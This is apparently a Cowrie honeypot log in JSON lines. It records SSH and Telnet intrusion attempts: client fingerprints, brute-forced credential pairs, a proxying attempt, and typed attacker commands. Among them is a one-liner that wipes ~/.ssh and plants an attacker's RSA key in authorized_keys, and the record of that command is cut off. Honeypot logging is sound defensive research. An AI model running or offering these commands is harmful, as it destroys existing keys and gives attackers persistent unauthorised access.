{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:14:39.077673Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:39.078628Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.session.connect","src_ip":"27.254.137.144","src_port":37040,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c810192e3a9","protocol":"ssh","message":"New connection: 27.254.137.144:37040 (1.2.3.4:22) [session: 1c810192e3a9]","sensor":"my-vps","timestamp":"2025-08-26T02:14:39.253108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:14:39.253974Z","src_ip":"27.254.137.144","session":"1c810192e3a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:14:39.432633Z","src_ip":"27.254.137.144","session":"1c810192e3a9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:14:40.190501Z","src_ip":"27.254.137.144","session":"1c810192e3a9"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:41.373820Z","src_ip":"27.254.137.144","session":"1c810192e3a9"}
{"eventid":"cowrie.session.connect","src_ip":"27.254.137.144","src_port":38092,"dst_ip":"1.2.3.4","dst_port":22,"session":"9edcbe543948","protocol":"ssh","message":"New connection: 27.254.137.144:38092 (1.2.3.4:22) [session: 9edcbe543948]","sensor":"my-vps","timestamp":"2025-08-26T02:14:41.556264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:14:41.556908Z","src_ip":"27.254.137.144","session":"9edcbe543948"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:14:41.739071Z","src_ip":"27.254.137.144","session":"9edcbe543948"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:14:42.510762Z","src_ip":"27.254.137.144","session":"9edcbe543948"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:42.693105Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:42.693832Z","src_ip":"27.254.137.144","session":"9edcbe543948"}
{"eventid":"cowrie.session.connect","src_ip":"87.121.84.168","src_port":57874,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f9c35e8ba84","protocol":"telnet","message":"New connection: 87.121.84.168:57874 (1.2.3.4:23) [session: 1f9c35e8ba84]","sensor":"my-vps","timestamp":"2025-08-26T02:14:46.019612Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:14:46.061699Z","src_ip":"87.121.84.168","session":"1f9c35e8ba84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:14:46.107518Z","src_ip":"87.121.84.168","session":"1f9c35e8ba84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33868,"dst_ip":"1.2.3.4","dst_port":22,"session":"650088995408","protocol":"ssh","message":"New connection: 212.227.235.229:33868 (1.2.3.4:22) [session: 650088995408]","sensor":"my-vps","timestamp":"2025-08-26T02:15:45.968137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:15:45.968998Z","src_ip":"212.227.235.229","session":"650088995408"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:15:46.248927Z","src_ip":"212.227.235.229","session":"650088995408"}
{"eventid":"cowrie.login.failed","username":"user","password":"123!@#","message":"login attempt [user/123!@#] failed","sensor":"my-vps","timestamp":"2025-08-26T02:15:47.409765Z","src_ip":"212.227.235.229","session":"650088995408"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:15:48.691863Z","src_ip":"212.227.235.229","session":"650088995408"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33005,"dst_ip":"1.2.3.4","dst_port":22,"session":"198dce63f1ad","protocol":"ssh","message":"New connection: 213.209.150.239:33005 (1.2.3.4:22) [session: 198dce63f1ad]","sensor":"my-vps","timestamp":"2025-08-26T02:15:51.408502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:15:51.409148Z","src_ip":"213.209.150.239","session":"198dce63f1ad"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T02:15:51.466049Z","src_ip":"213.209.150.239","session":"198dce63f1ad"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:15:51.747991Z","src_ip":"213.209.150.239","session":"198dce63f1ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":9519,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:9519","sensor":"my-vps","timestamp":"2025-08-26T02:15:51.805369Z","session":"198dce63f1ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:15:51.862032Z","src_ip":"213.209.150.239","session":"198dce63f1ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":17748,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17748","sensor":"my-vps","timestamp":"2025-08-26T02:15:52.018991Z","session":"198dce63f1ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:15:52.075660Z","src_ip":"213.209.150.239","session":"198dce63f1ad"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:15:52.133149Z","src_ip":"213.209.150.239","session":"198dce63f1ad"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":58962,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ab64bb3524c","protocol":"ssh","message":"New connection: 45.88.8.215:58962 (1.2.3.4:22) [session: 2ab64bb3524c]","sensor":"my-vps","timestamp":"2025-08-26T02:16:14.104318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:16:14.507426Z","src_ip":"45.88.8.215","session":"2ab64bb3524c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:16:14.508173Z","src_ip":"45.88.8.215","session":"2ab64bb3524c"}
{"eventid":"cowrie.login.success","username":"root","password":"Jolon@123","message":"login attempt [root/Jolon@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:16:16.620513Z","src_ip":"45.88.8.215","session":"2ab64bb3524c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:16:17.098451Z","src_ip":"45.88.8.215","session":"2ab64bb3524c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46458,"dst_ip":"1.2.3.4","dst_port":22,"session":"e74a0cf869d2","protocol":"ssh","message":"New connection: 212.227.125.160:46458 (1.2.3.4:22) [session: e74a0cf869d2]","sensor":"my-vps","timestamp":"2025-08-26T02:16:19.053265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:16:19.053946Z","src_ip":"212.227.125.160","session":"e74a0cf869d2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T02:16:19.104844Z","src_ip":"212.227.125.160","session":"e74a0cf869d2"}
{"eventid":"cowrie.login.success","username":"root","password":"QWER!@#$","message":"login attempt [root/QWER!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:16:19.258612Z","src_ip":"212.227.125.160","session":"e74a0cf869d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:16:19.418569Z","src_ip":"212.227.125.160","session":"e74a0cf869d2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T02:16:19.419304Z","src_ip":"212.227.125.160","session":"e74a0cf869d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:16:19.471149Z","src_ip":"212.227.125.160","session":"e74a0cf869d2"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:16:19.472297Z","src_ip":"212.227.125.160","session":"e74a0cf869d2"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.29.240","src_port":47488,"dst_ip":"1.2.3.4","dst_port":22,"session":"e42de49d535f","protocol":"ssh","message":"New connection: 154.221.29.240:47488 (1.2.3.4:22) [session: e42de49d535f]","sensor":"my-vps","timestamp":"2025-08-26T02:16:23.243247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:16:23.244393Z","src_ip":"154.221.29.240","session":"e42de49d535f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56714,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6cfcbcf6bcd","protocol":"ssh","message":"New connection: 217.72.205.35:56714 (1.2.3.4:22) [session: a6cfcbcf6bcd]","sensor":"my-vps","timestamp":"2025-08-26T02:16:54.352144Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:16:54.353488Z","src_ip":"217.72.205.35","session":"a6cfcbcf6bcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52136,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fa9e704acb4","protocol":"ssh","message":"New connection: 212.227.235.229:52136 (1.2.3.4:22) [session: 8fa9e704acb4]","sensor":"my-vps","timestamp":"2025-08-26T02:17:02.570587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:17:02.572306Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:17:02.832568Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer123$","message":"login attempt [root/qwer123$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:17:03.911766Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:17:04.451890Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:17:04.452736Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:17:04.453807Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:17:04.717256Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:17:05.361124Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 